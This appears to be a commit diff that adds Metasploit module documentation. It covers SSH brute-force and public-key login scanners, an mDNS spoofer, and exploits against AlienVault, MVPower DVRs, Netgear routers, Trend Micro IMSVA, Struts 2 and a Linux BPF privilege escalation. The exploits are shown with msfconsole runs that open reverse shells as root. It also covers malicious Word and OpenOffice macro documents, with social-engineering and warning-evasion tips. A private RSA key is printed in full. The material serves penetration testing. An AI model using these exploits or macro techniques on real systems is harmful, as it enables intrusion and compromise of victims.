9 shell /linux SSH ubuntu:ubuntu (192.168.2.137:22) 192.168.2.117:37027 -> 192.168.2.137:22 (192.168.2.137)
```
Example run against:
* Windows 10 w/ Linux Subsystem
```
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.2.140
rhosts => 192.168.2.140
msf auxiliary(ssh_login) > set username winuser
username => winuser
msf auxiliary(ssh_login) > set password "badpassword"
password => badpassword
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'winuser:badpassword' ''
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.117:42227 -> 192.168.2.140:22) at 2017-02-22 20:40:12 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell / SSH winuser:badpassword (192.168.2.140:22) 192.168.2.117:42227 -> 192.168.2.140:22 (192.168.2.140)
```
Example run against:
* Windows 10 w/ Bitvise SSH Server (WinSSHD) version 7.26-r2 and a virtual account created
It is important to note here that the module gives back a **Success**, but then errors when trying to identify the remote system.
This should be enough info to manually exploit via a regular SSH command.
```
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.2.140
rhosts => 192.168.2.140
msf auxiliary(ssh_login) > set username virtual
username => virtual
msf auxiliary(ssh_login) > set password virtual
password => virtual
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'virtual:virtual' 'id: Command not found. help ?: Command not found. '
[!] No active DB -- Credential data will not be saved!
[*] 192.168.2.140 - Command shell session 4 closed. Reason: Died from EOFError
[*] Command shell session 4 opened (192.168.2.117:36169 -> 192.168.2.140:22) at 2017-02-22 21:20:24 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

141
documentation/modules/auxiliary/scanner/ssh/ssh_login_pubkey.md Normal file
View File

@ -0,0 +1,141 @@
## SSH Service
SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level. SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
This module attempts to login to SSH with username and private key combinations. For username and password logins, please use `auxiliary/scanner/ssh/ssh_login`.
It should be noted that some modern Operating Systems have default configurations to not allow the `root` user to remotely login via SSH, or to only allow `root` to login with an SSH key login.
### Key Generation
On most modern *nix Operating System, the `ssh-keygen` command can be utilized to create an SSH key. Metasploit expects the key to be unencrypted, so no password should be set during `ssh-keygen`.
After following the prompts to create the SSH key pair, the `pub` key needs to be added to the authorized_keys list. To do so simply run: `cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys`
## Verification Steps
1. Install SSH and start it.
2. Create an SSH keypair and add the public key to the `authorized_keys` file
3. Start msfconsole
4. Do: ` use auxiliary/scanner/ssh/ssh_login_pubkey`
5. Do: `set rhosts`
6. Do: set usernames with one of the available options
7. Do: `set KEY_PATH ` to either a file or path
7. Do: `run`
8. You will hopefully see something similar to the following:
```
[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
```
## Options
**KEY_PATH**
A string to the private key to attempt, or a folder containing private keys to attempt. Any file name starting with a period (`.`) or ending in `.pub` will be ignored.
An SSH key is typically kept in a user's home directory under `.ssh/id_rsa`. The file contents, when not encrypted with a password will start with `-----BEGIN RSA PRIVATE KEY-----`
**RHOSTS**
Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line. File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
**STOP_ON_SUCCESS**
If a valid login is found on a host, immediately stop attempting additional logins on that host.
**USERNAME**
Username to try for each password.
**USER_FILE**
A file containing a username on every line.
**VERBOSE**
Show a failed login attempt. This can get rather verbose when large `USER_FILE`s or `KEY_PATH`s are used. A failed attempt will look similar to the following: `[-] SSH - Failed`
## Option Combinations
It is important to note that usernames can be entered in multiple combinations. For instance, a username could be set in `USERNAME`, and be part of `USER_FILE`.
This module makes a combination of all of the above when attempting logins. So if a username is set in `USERNAME`, and a `USER_FILE` is listed, usernames will be generated from BOTH of these.
## Scenarios
Example run with a FOLDER set for `KEY_PATH` against:
* Ubuntu 14.04 Server
While the two SSH key are nearly identical, one character has been modified in one of the keys to prevent a successful login.
```
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.156
rhosts => 192.168.2.156
msf auxiliary(ssh_login_pubkey) > set username ubuntu
username => ubuntu
msf auxiliary(ssh_login_pubkey) > set key_path /root/sshkeys/
key_path => /root/sshkeys/
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.2.156:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 2 keys from /root/sshkeys
[-] SSH - Failed: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAtwJrqowPyjWONHUCMqU/Fh3yRn42+X9hahtTv/6plYpb4WrA
NxDaYIrBGAO//u2SkGcIhnAdzYVmovWahKEwcxZ2XJo/nj4gjh1CbI1xVCFeE/oX
oWpIN+4q8JQ0Iq1dm+c+WPQIEzlVpMRaKeuMxdGPNMTYWxolSEIMPPYmyWXG6gz8
fYYZDo8+w8G78w7oUV6hSIwCDzw09A5yGyt51ZETeSZiZ24bHlBQSyk7yFq/eo58
xhlc79jpZrSdX8kx8HrCZKND7O6E4YSktfSHOvd81QUCSyoi5Y+9RXsLjUEba0+Y
aAz8mZPLdxbRu75eeD/mZTv5gALewXeb65IkPQIDAQABAoIBACvi5LbNR6wSE7v4
o0JJ5ksDe2n0MnK6XT34t6i/BSPbPhVcaCPMYtHr9Eox/ATCK/d8/cpfcIYsi2Rg
yWEs1lWC+XdTdhYYh+4MjjVB5f9q0QixXKFUv2TKNHnk0GvQbzZHyefC/Xy+rw8I
FyceWW/GxTS+T7PpHS+qxwyHat24ph7Xz/cE/0UyrVu+NAzFXaHq60M2/RRh3uXE
1vqiZVlapczO/DxsnPwQrE2EOm0lzrQVmZbX5BYK1yiCd5eTgLhOb+ms2p/8pb2I
jrK5FzLnUZu0H0ZHtihOVkx4l8NZqB36jinaRs0wWN7It4/C5+NkyoMvuceIn1Wx
tstYD3ECgYEA7sOb0CdGxXw0IVrJF+3C8m1UG3CfQfzms+rJb9w3OJVl2BTlYdPr
JgXI/YoV9FQPvXmTWrRP9e6x0kuSVHO1ejMpyLHGmMcJDZhpVKMROOosIWfROxwk
bkPU2jdUXIrHgu8NnmnyytjUnJgeerQZLhCtjKmBKCZisS4WPBdun3MCgYEAxDh1
fjFJttWhgeg6pcvvmDUWO1W0lJ9ZjjQll1UmbPmKDGwwsjPZEkZfLkvI77st81AT
eW/p7tMKE3fCkXkn2KWMQ6ZGN5yflwvjJOMAVZz8ir8Cu1npa6f6HIrxpHSKethY
dG4ssCpQctfoRfN4wg6fOHBOpGd3BH1GdOwR4Y8CgYEAq3h7e//ZCZbrcVDbvn2Y
VbZCgvpcxW002d0yEU2bst1IKOjI23rwE3xwHfV/UtrT+wVG2AtKqZpkxlxTmKcI
m9wGlAVoVOwMCmF8s7XwdmlmjA8c6lCJsU6xnI3D3jokklnP9AauwRL7jgKJUSHq
O3TqzmwlP4phslEg0sMZRRUCgYEAwkS3prG7rqYBmjFG52FqnIJquWIYQFEoBE+C
rDqkqZ3B3Jy89aG5l4tOrvJfRWJHky7DqSZxMH+G6VFXtFmEZs04er3DpUmPA6fE
Qn/wk9KygdetJ7pUDL8pNFsn9M9hT1Ck+tkdq2ipb5ptn9v2wgJiBynB4qmBP1Oc
jyQua+cCgYEAl77hJQK97tdJ5TuOXSsdpW8IMvbiaWTgvZtKVJev31lWgJ+knpCf
AaZna5YokhaNvfGGbO5N8YoYShIpGdvWI+dIT8xYvPkJmYdnTz7/dmBUcwLtNVx/
7PI/l5XrFMRsnu/CYuBPuWB+RCTLjIr1D1RluNbIb7xr+kDHuzgInvA=
-----END RSA PRIVATE KEY-----
'
[!] No active DB -- Credential data will not be saved!
[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAtwJrqowPyjWONHUCMqU/Fh3yRn42+X9hahtTv/6plYpb4WrA
NxDaYIrBGAO//u2SkGcIhnAdzYVmovWahKEwcxZ2XJo/nj4gjh1CbI1xVCFeE/oX
oWpIN+4q8JQ0Iq1dm+c+WPQIEzlVpMRaKeuMxdGPNMTYWxolSEIMPPYmyWXG6gz8
fYYZDo8+w8G78w7oUV6hSIwCDzw09A5yGyt51ZETeSZiZ24bHlBQSyk7yFq/eo58
xhlc79jpZrSdX8kx8HrCZKND7O6E4YSktfSHOvd81QUCSyoi5Y+9RXsLjUEba0+Y
0Az8mZPLdxbRu75eeD/mZTv5gALewXeb65IkPQIDAQABAoIBACvi5LbNR6wSE7v4
o0JJ5ksDe2n0MnK6XT34t6i/BSPbPhVcaCPMYtHr9Eox/ATCK/d8/cpfcIYsi2Rg
yWEs1lWC+XdTdhYYh+4MjjVB5f9q0QixXKFUv2TKNHnk0GvQbzZHyefC/Xy+rw8I
FyceWW/GxTS+T7PpHS+qxwyHat24ph7Xz/cE/0UyrVu+NAzFXaHq60M2/RRh3uXE
1vqiZVlapczO/DxsnPwQrE2EOm0lzrQVmZbX5BYK1yiCd5eTgLhOb+ms2p/8pb2I
jrK5FzLnUZu0H0ZHtihOVkx4l8NZqB36jinaRs0wWN7It4/C5+NkyoMvuceIn1Wx
tstYD3ECgYEA7sOb0CdGxXw0IVrJF+3C8m1UG3CfQfzms+rJb9w3OJVl2BTlYdPr
JgXI/YoV9FQPvXmTWrRP9e6x0kuSVHO1ejMpyLHGmMcJDZhpVKMROOosIWfROxwk
bkPU2jdUXIrHgu8NnmnyytjUnJgeerQZLhCtjKmBKCZisS4WPBdun3MCgYEAxDh1
fjFJttWhgeg6pcvvmDUWO1W0lJ9ZjjQll1UmbPmKDGwwsjPZEkZfLkvI77st81AT
eW/p7tMKE3fCkXkn2KWMQ6ZGN5yflwvjJOMAVZz8ir8Cu1npa6f6HIrxpHSKethY
dG4ssCpQctfoRfN4wg6fOHBOpGd3BH1GdOwR4Y8CgYEAq3h7e//ZCZbrcVDbvn2Y
VbZCgvpcxW002d0yEU2bst1IKOjI23rwE3xwHfV/UtrT+wVG2AtKqZpkxlxTmKcI
m9wGlAVoVOwMCmF8s7XwdmlmjA8c6lCJsU6xnI3D3jokklnP9AauwRL7jgKJUSHq
O3TqzmwlP4phslEg0sMZRRUCgYEAwkS3prG7rqYBmjFG52FqnIJquWIYQFEoBE+C
rDqkqZ3B3Jy89aG5l4tOrvJfRWJHky7DqSZxMH+G6VFXtFmEZs04er3DpUmPA6fE
Qn/wk9KygdetJ7pUDL8pNFsn9M9hT1Ck+tkdq2ipb5ptn9v2wgJiBynB4qmBP1Oc
jyQua+cCgYEAl77hJQK97tdJ5TuOXSsdpW8IMvbiaWTgvZtKVJev31lWgJ+knpCf
AaZna5YokhaNvfGGbO5N8YoYShIpGdvWI+dIT8xYvPkJmYdnTz7/dmBUcwLtNVx/
7PI/l5XrFMRsnu/CYuBPuWB+RCTLjIr1D1RluNbIb7xr+kDHuzgInvA=
-----END RSA PRIVATE KEY-----
' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.2.117:44179 -> 192.168.2.156:22) at 2017-02-22 22:08:11 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

71
documentation/modules/auxiliary/spoof/mdns/mdns_response.md Normal file
View File

@ -0,0 +1,71 @@
This module will listen for mDNS multicast requests on 5353/udp for A and AAAA record queries, and respond with a spoofed IP address (assuming the request matches our regex).
## Vulnerable Application
To use mdns_response, be on a network with devices/applications that can make mDNS multicast requests on 5353/udp for A and AAAA record queries.
## Verification Steps
1. `use auxiliary/spoof/mdns/mdns_response`
2. `set INTERFACE network_iface`
3. `set SPOOFIP4 10.x.x.x`
4. `run`
## Options
**The SPOOFIP4 option**
IPv4 address with which to spoof A-record queries
```
set SPOOFIP4 [IPv4 address]
```
**The SPOOFIP6 option**
IPv6 address with which to spoof AAAA-record queries
```
set SPOOFIP6 [IPv6 address]
```
**The REGEX option**
Regex applied to the mDNS to determine if spoofed reply is sent
```
set REGEX [regex]
```
**The TTL option**
Time To Live for the spoofed response (in seconds)
```
set TTL [number of seconds]
```
## Scenarios
```
msf > use auxiliary/spoof/mdns/mdns_response
msf auxiliary(mdns_response) > set SPOOFIP4 10.x.x.y
SPOOFIP4 => 10.x.x.y
msf auxiliary(mdns_response) > set INTERFACE en3
INTERFACE => en3
msf auxiliary(mdns_response) > run
[*] Auxiliary module execution completed
msf auxiliary(mdns_response) >
[*] mDNS spoofer started. Listening for mDNS requests with REGEX "(?-mix:.*)" ...
```
On Victim Machine
```
ping something.local
```
(IP address should resolve to spoofed address)
```
[+] 10.x.x.z mDNS - something.local. matches regex, responding with 10.x.x.y
```

58
documentation/modules/exploit/linux/http/alienvault_exec.md Normal file
View File

@ -0,0 +1,58 @@
## Vulnerable Application
This module exploits object injection, authentication bypass and ip spoofing vulnerabities all together. Unauthenticated users can execute arbitrary commands under the context of the root user.
By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability
which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue
action and policy that enables to execute operating system commands by using captured session token. As a final step,
SSH login attempt with a invalid credentials can trigger a created rogue policy which triggers an action that executes
operating system command with root user privileges.
This module was tested against AlienVault USM 5.2.5.
**Vulnerable Application Installation Steps**
Major version of older releases can be found at following URL.
[http://downloads.eu.alienvault.com/c/download](http://downloads.eu.alienvault.com/c/download)
You can download file named as AlienVault-USM_trial_5.2.5.zip which contains a OVA file.
In order to complete installation phase, you have to apply [https://www.alienvault.com/try-it-free](https://www.alienvault.com/try-it-free) .
Once alienvault sales team validate your information, you will be able to complete the installation with your e-mail adress.
## Verification Steps
A successful check of the exploit will look like this:
```
msf > use exploit/linux/http/alienvault_exec
msf exploit(alienvault_exec) > set RHOST 12.0.0.137
RHOST => 12.0.0.137
msf exploit(alienvault_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(alienvault_exec) > check
[+] 12.0.0.137:443 The target is vulnerable.
msf exploit(alienvault_exec) > exploit
[*] Started reverse TCP handler on 12.0.0.1:4445
[*] Hijacking administrator session
[+] Admin session token : PHPSESSID=2gbhp8j5f2af0vu5es5t3083q4
[*] Creating rogue action
[+] Action created: aWbhnZFHqYbUbNW
[*] Retrieving rogue action id
[+] Corresponding Action ID found: D62A1D4A6D3AEEA65F99B606B02197A1
[*] Retrieving policy ctx and group values
[+] CTX Value found: 5E22D6A9E79211E6B8E4000C29F647D7
[+] GROUP Value found: 00000000000000000000000000000000
[*] Creating a policy that uses our rogue action
[+] Policy created: ASdKHQOZVONGzfU
[*] Activating the policy
[+] Rogue policy activated
[*] Triggering the policy by performing SSH login attempt
[+] SSH - Failed authentication. That means our policy and action will be trigged..!
[*] Sending stage (38500 bytes) to 12.0.0.137
[*] Meterpreter session 6 opened (12.0.0.1:4445 -> 12.0.0.137:51674) at 2017-01-31 14:13:49 +0300
meterpreter > getuid
Server username: root
meterpreter >
```

43
documentation/modules/exploit/linux/http/mvpower_dvr_shell_exec.md Normal file
View File

@ -0,0 +1,43 @@
## Vulnerable Application
This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands in the query string.
This module was tested successfully on a MVPower model TV-7104HE with firmware version 1.8.4 115215B9 (Build 2014/11/17).
The TV-7108HE model is also reportedly affected, but untested.
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/linux/http/mvpower_dvr_shell_exec`
3. Do: `set rhost [IP]`
4. Do: `set lhost [IP]`
5. Do: `run`
6. You should get a session
## Example Run
```
msf exploit(mvpower_dvr_shell_exec) > run
[*] Started reverse TCP handler on 10.1.1.197:4444
[*] 10.1.1.191:80 - Connecting to target
[+] 10.1.1.191:80 - Target is vulnerable!
[*] Using URL: http://0.0.0.0:8080/BBRyjDtj81x3bTq
[*] Local IP: http://10.1.1.197:8080/BBRyjDtj81x3bTq
[*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.191:56881) at 2017-02-21 23:59:33 -0500
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 10.1.1.191
OS : (Linux 3.0.8)
Architecture : armv7l
Meterpreter : armle/linux
meterpreter >
```

58
documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md Normal file
View File

@ -0,0 +1,58 @@
The netgear_r7000_cgibin_exec module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router.
## Vulnerable Application
Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and possibly earlier.
## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/http/netgear_r7000_cgibin_exec`
3. Do: `set RHOST <RouterIP>`
4. Do: `set PAYLOAD <payload>`
5. Do: `run`
6. If the router is a R7000 or R6400, the module should run
## Options
**PAYLOAD**
The valid payloads are `cmd/unix` payloads _only_, as this is a command execution module
## Scenarios
Sample output of the options looks like so
```
msf exploit(netgear_r7000_cgibin_exec) > options
Module options (exploit/linux/http/netgear_r7000_cgibin_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.1.1 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.153.34 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(netgear_r7000_cgibin_exec) >
```

71
documentation/modules/exploit/linux/http/trend_micro_imsva_exec.md Normal file
View File

@ -0,0 +1,71 @@
## Vulnerable Application
This module exploits a command injection vulnerability in the Trend Micro InterScan Messaging Security (Virtual Appliance) product. An authenticated user can execute a terminal command under the context of the web server user which is root. Besides, default installation of IMSVA comes with a default administrator credentials.
saveCert.imss endpoint takes several user inputs and performs blacklisting. After that it use them as argument of predefined operating system command without proper sanitation. However,due to improper blacklisting rule it's possible to inject arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
**Vulnerable Application Installation Steps**
IMSVA is distrubed as an ISO image by Trend Micro.
Following steps are valid on the CentOS 6 x64 bit operating system.
1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
2. Find "InterScan Messaging Security (Virtual Appliance)" and click.
3. At the time of writing this documentation, you must see "IMSVA-9.1-1600-x86-64-r2.iso" next to Download button.
4. Click to the download button and complete installation of ISO.
If you don't see a affected version of IMSVA, you can try to download IMSVA-9.1-1600 directly from following URL.
[http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso](http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso)
**System requirements:**
- Virtualbox or VMware can be used.
- 4 GB of memory at least.
- 120 GB of disk size at least.
## Verification Steps
A successful check of the exploit will look like this:
```
msf > use exploit/linux/http/trend_micro_imsva_exec
msf exploit(trend_micro_imsva_exec) > set RHOST 12.0.0.140
RHOST => 12.0.0.140
msf exploit(trend_micro_imsva_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(trend_micro_imsva_exec) > exploit
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Attempting to login with admin:imsva
[+] Authenticated as admin:imsva
[*] Delivering payload...
[*] Sending stage (38622 bytes) to 12.0.0.140
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.140:60822) at 2017-01-18 11:29:36 +0300
meterpreter > getuid
Server username: root
meterpreter >
```
You must be getting ```no access``` error if the supplied username and password or default credentials are wrong.
```
msf exploit(trend_micro_imsva_exec) > back
msf > use exploit/linux/http/trend_micro_imsva_exec
msf exploit(trend_micro_imsva_exec) > set RHOST 12.0.0.140
RHOST => 12.0.0.140
msf exploit(trend_micro_imsva_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(trend_micro_imsva_exec) >
msf exploit(trend_micro_imsva_exec) > set USERNAME notvalid
USERNAME => notvalid
msf exploit(trend_micro_imsva_exec) > set PASSWORD notvalid123
PASSWORD => notvalid123
msf exploit(trend_micro_imsva_exec) > exploit
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Attempting to login with notvalid:notvalid123
[-] Exploit aborted due to failure: no-access: 12.0.0.140:8445 - Login with notvalid:notvalid123 failed...
[*] Exploit completed, but no session was created.
```

12
documentation/modules/exploit/linux/local/bpf_priv_esc.md
View File

@ -1,19 +1,19 @@
## Notes
This module (and the original exploit) are written in several parts: hello, doubleput, and suidhelper.
This module (and the original exploit) are written in several parts: `hello`, `doubleput`, and `suidhelper`.
Mettle at times on this exploit will give back an invalid session number error. In these cases payload/linux/x64/shell/bind_tcp seemed to always work.
Mettle at times on this exploit will give back an invalid session number error. In these cases `payload/linux/x64/shell/bind_tcp` seemed to always work.
As of PR submission, the original shell becomes unresposive when the root shell occurs. Metasm fails to compile due to fuse.h being required.
As of PR submission, the original shell becomes unresposive when the root shell occurs. Metasm fails to compile due to `fuse.h` being required.
As of PR submission, killing of the process hello and doubleput has to occur manually. /tmp/fuse_mount also needs to be unmounted and deleted.
As of PR submission, killing of the process `hello` and `doubleput` has to occur manually. `/tmp/fuse_mount` also needs to be unmounted and deleted.
## Creating A Testing Environment
There are a few requirements for this module to work:
1. CONFIG_BPF_SYSCALL=y must be set in the kernel (default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
2. kernel.unprivileged_bpf_disabled can't be set to 1 (default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
1. `CONFIG_BPF_SYSCALL=y` must be set in the kernel (default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
2. `kernel.unprivileged_bpf_disabled` can't be set to `1` (default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
3. fuse needs to be installed (non-default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
Using Ubuntu 16.04, simply `sudo apt-get install fuse` and you're all set!

97
documentation/modules/exploit/multi/fileformat/office_word_macro.md Normal file
View File

@ -0,0 +1,97 @@
## Description
This module generates a macro-enabled Microsoft Office Word document. It does not target a specific
CVE or vulnerability, this is more of a feature-abuse in Office, however this type of
social-engineering attack still remains common today.
There are many ways to create this type of malicious doc. The module injects the Base64-encoded
payload in the comments field, which will get decoded back by the macro and executed as a Windows
executable when the Office document is launched.
## Vulnerable Application
A Windows or OSX machine with Microsoft Office installed. The Office application must support the docm
format.
Specifically, this module was tested specifically against:
* Microsoft Office 2010.
* Microsoft Office 2013.
* Microsoft Office 2016.
* Microsoft Office Word 15.29.1 (161215).
## Verification Steps
1. ```use exploit/multi/fileformat/office_word_macro```
2. ```set PAYLOAD [PAYLOAD NAME]```
3. Configure the rest of the settings accordingly (BODY, LHOST, LPORT, etc)
4. ```exploit```
5. The module should generate the malicious docm.
## Options
**BODY** Text to put in the Office document. See **Modification** below if you wish to modify more.
## Demo
In this example, first we generate the malicious docm exploit, and then we set up a
windows/meterpreter/reverse_tcp handler to receive a session. Next, we copy the docm
exploit to a Windows machine with Office 2013 installed, when the document runs the
macro, we get a session:
![macro_demo](https://cloud.githubusercontent.com/assets/1170914/22602348/751f9d66-ea08-11e6-92ce-4e52f88aaebf.gif)
## Modification
To use this exploit in a real environment, you will most likely need to modify the docm content.
Here's one approach you can do:
1. Use the module to generate the malicious docm
2. Copy the malicious docm to the vulnerable machine, and edit it with Microsoft Office (such as 2013).
When you open the document, the payload will probably do something on your machine. It's ok,
since you generated it, it should not cause any problems for you.
3. Save the doc, and test again to make sure the payload still works.
While editing, you should avoid modifying the following unless you are an advanced user:
* The comments field. If you have to modify this, make sure to create 55 empty spaces
in front of the payload string. The blank space is for making the payload less obvious
at first sight if the user views the file properties.
* The VB code in the macro.
## Trusted Document
By default, Microsoft Office does not execute macros automatically unless it is considered as a
trusted document. This means that if a macro is present, the user will most likely need to manually
click on the "Enable Content" button in order to run the macro.
Many in-the-wild attacks face this type of challenge, and most rely on social-engineering to trick
the user into allowing the macro to run. For example, making the document look like something
written from a legit source, such as [this attack](https://motherboard.vice.com/en_us/article/these-hackers-cleverly-disguised-their-malware-as-a-document-about-trumps-victory).
To truly make the macro document to run without any warnings, you must somehow figure out a way to
sign the macro by a trusted publisher, or using a certificate that the targeted machine trusts.
For testing purposes, another way to have a certificate is to create a self-signed one using
Microsoft Office's SELFCERT.exe utility. This tool can be found in the following path on
Windows:
```
C:\Program Files\Microsoft Office\root\Office16\SELFCERT.exe
```
In Office 2010, the self-signing tool is actually an option in the Office tools folder in the
start menu. It should be named "Digital Certificate for VBA Projects".
Double-click on the executable, enter a random name and click "OK", at this point you have a
certificate to play with.
Next, we want to flag this certificate as trusted:
1. Click on Start, and then enter "Internet Options".
2. Click on the Content tab, and then click on the Certificates button.
3. You should see your new certificate under the Personal tab, export it.
4. Click on the Trusted Publishers, and then import your personal certificate.
5. Try the macro exploit again, it should run the malicious code without warning.

0
documentation/modules/exploit/multi/fileformat/swagger_param_inject.md Executable file → Normal file
View File

104
documentation/modules/exploit/multi/http/struts2_content_type_ognl.md Normal file
View File

@ -0,0 +1,104 @@
`struts2_content_type_ognl` is a module that exploits Apache Struts 2's Jakarta Multipart
parser, which makes it possible to perform arbitrary code execution with a malicious HTTP
`Content-Type` value.
## Vulnerable Application
Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10 are vulnerable.
You can download these versions here with any version of Apache Tomcat:
http://archive.apache.org/dist/struts/
You will also need to install a Struts 2 showcase application, which can be found here:
https://mvnrepository.com/artifact/org.apache.struts/struts2-showcase
## Options
**TARGETURI**
The path to a struts application action
**VHOST**
The HTTP server virtual host. You will probably need to configure this as well, even though it is
set as optional.
## Demonstration
**The Check Command**
The `struts2_content_type_ognl` module comes with a check command that can effectively check
if the remote host is vulnerable or not. To use this, configure the msfconsole similar to the
following:
```
set VERBOSE true
set RHOST [IP]
set TARGETURI [path to the Struts app with an action]
```
When the module is in verbose mode, the `check` command will try to tell you the OS information,
and whether or not the machine is vulnerable. Like this:
```
msf exploit(struts2_content_type_ognl) > check
[+] Victim operating system: Linux
[+] 10.1.11.11:8080 The target is vulnerable.
```
**Exploiting the Host**
After identifying the vulnerability on the target machine, you can try to exploit it.
The exploit supports mainly two platforms: Windows and Linux. To see a list of available payloads,
try to do `show payloads`, and pick one. The following example demonstrates us exploiting a
vulnerable Ubuntu host:
```
msf exploit(struts2_content_type_ognl) > show options
Module options (exploit/multi/http/struts2_content_type_ognl):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.1.11.11 yes The target address
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /struts2-showcase/ yes The path to a struts application action
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
DebugOptions 0 no Debugging options for POSIX meterpreter
LPORT 4444 yes The listen port
RHOST 10.1.11.11 no The target address
Exploit target:
Id Name
-- ----
0 Universal
msf exploit(struts2_content_type_ognl) > run
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
{"Server"=>"Apache-Coyote/1.1",
"Set-Cookie"=>"JSESSIONID=548FF051466E6C1F3AAE814E385057DE; Path=/; HttpOnly",
"Content-Type"=>"text/html;charset=UTF-8",
"Content-Length"=>"6335",
"Date"=>"Tue, 14 Mar 2017 21:04:06 GMT"}
[*] Sending stage (1495599 bytes) to 10.1.11.11
[*] Meterpreter session 5 opened (192.168.1.11:50671 -> 10.1.11.11:4444) at 2017-03-14 16:04:36 -0500
meterpreter >
```

63
documentation/modules/exploit/multi/misc/openoffice_document_macro.md Normal file
View File

@ -0,0 +1,63 @@
## Description
This module generates an Apache OpenOffice Text Document with a malicious macro in it. It also
works against LibreOffice.
To exploit successfully, the targeted user must adjust the security level in Macro Security to
either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the
macro. If set to Low, the macro can automatically run without any warning.
## Vulnerable Application
* Apache OpenOffice
* LibreOffice
## Verification Steps
To use this exploit, you must know the platform of the targeted user. The module supports Windows,
Linux, and OSX. If the target is using Windows, then the exploit will generate the macro
with malicious Powershell code inside. For other supported platforms, the exploit will generate
Python code.
An example of using this module against Windows:
1. Start msfconsole
2. ```use exploit/multi/misc/openoffice_document_macro```
3. ```set target 0```
4. ```set payload windows/meterpreter/reverse_tcp```
5. ```exploit```
An example of using this module against Linux or OSX:
1. Start msfconsole
2. ```use exploit/multi/misc/openoffice_document_macro```
3. ```set target 1```
4. ```set payload python/meterpreter/reverse_tcp```
5. ```exploit```
Once started, the module will mainly do these things:
1. It will start a payload handler.
2. It will start a web server. This is used for the macro to download and execute our final payload.
3. The malicious odt file. Send this to your targeted user.
## Options
**BODY**
This option can be used to insert text to the malicious document.
## Demo
